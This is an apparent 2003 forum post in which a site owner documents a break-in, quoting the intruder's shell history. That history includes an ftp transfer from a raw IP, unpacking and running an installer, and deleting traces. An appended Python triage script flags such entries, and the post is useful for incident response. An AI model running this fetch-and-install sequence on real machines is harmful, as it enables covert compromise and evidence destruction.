Big Website Hack Documented
From: Colnel Panic (yeah@boy.com)
Date: 03/25/03
From: Colnel Panic <yeah@boy.com> Date: Tue, 25 Mar 2003 00:55:01 GMT
chuckwest.org
One of the many hack attempts at this machine actually worked. This was
not a zombie virus floating around the net. This was, so it appears, an
evil person sitting at a machine somewhere obviously cracking this site.
That's the bad news. The good news is it was back up in less than 30
minutes. I'll have to restore the data but I put the server back up to
piss someone off. I will be on the net whether you like it or not. The
games are fun however and I would miss them if they were gone.
How The Event Unfolded:
It started when I noticed my search engine was not functioning. I
switched to a virtual console (tty1) and pressed the up arrow to look for
a command I typed earlier. There I found 11 or 12 commands that I did
not type. They are:
linuxconf - I may have typed this one. The following I am sure I did not
type.
export TERM='dumb'
reset
id
ftp 209.171.43.28
tar xvfz gety.tgz - (That's gety.tgz not getty.tgz)
cd gety
./install
cd /tmp
rm -rf km3
exit
Before the machine fell apart in my hands I was able to recover the
/var/log directory and publish it at chuckwest.org/log for anyone who
might care to look at it.
As of now I am dedicated to finding who would do this. This is a rare case
because, by luck, I was able to document the incident in great detail.
I'd like to find out just exactly who my "enemy" is and make their life
a living hell. Just for fun of course.
-Chuck
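
Added example, not part of the original post: a small triage script that flags the kind of shell-history entries quoted above and checks for a transfer, unpack, run-installer sequence. The rule names, the patterns and the window size are assumptions of this example; the sample history is constructed from the commands in the post.

```python
import re

# Constructed sample: the commands quoted in the post plus one benign line.
HISTORY = """linuxconf
export TERM='dumb'
reset
id
ftp 209.171.43.28
tar xvfz gety.tgz
cd gety
./install
cd /tmp
rm -rf km3
exit
vi /etc/hosts""".splitlines()

# Heuristic rules: assumptions of this example, not a complete signature set.
RULES = [
    ("term-fixup", re.compile(r"^export\s+TERM=|^reset$")),
    ("identity-check", re.compile(r"^(id|whoami)$")),
    ("transfer-to-raw-ip", re.compile(r"^(ftp|wget|curl|scp)\b.*\b\d{1,3}(\.\d{1,3}){3}\b")),
    ("unpack-archive", re.compile(r"^tar\s+\S*x\S*\s+\S+\.(tgz|tar\.gz|tar)$")),
    ("run-local-installer", re.compile(r"^\./\S+")),
    ("recursive-delete", re.compile(r"^rm\s+-\S*r\S*f|^rm\s+-\S*f\S*r")),
]

def flag_history(lines):
    """Return (line_number, rule_name, command) for the first rule each line matches."""
    hits = []
    for n, raw in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(raw.strip()):
                hits.append((n, name, raw.strip()))
                break
    return hits

def has_fetch_unpack_run(hits, window=6):
    """True when a transfer, an unpack and a local installer run appear in
    that order, all within `window` history lines of the transfer."""
    order = ["transfer-to-raw-ip", "unpack-archive", "run-local-installer"]
    for start, name, _ in hits:
        if name != order[0]:
            continue
        step, last = 1, start
        for n, nm, _ in hits:
            if n > last and n - start <= window and nm == order[step]:
                step, last = step + 1, n
                if step == len(order):
                    return True
    return False
```

Shell history is only as trustworthy as the account that wrote it, so hits from a script like this are a starting point for review alongside the saved /var/log data, not proof of what ran.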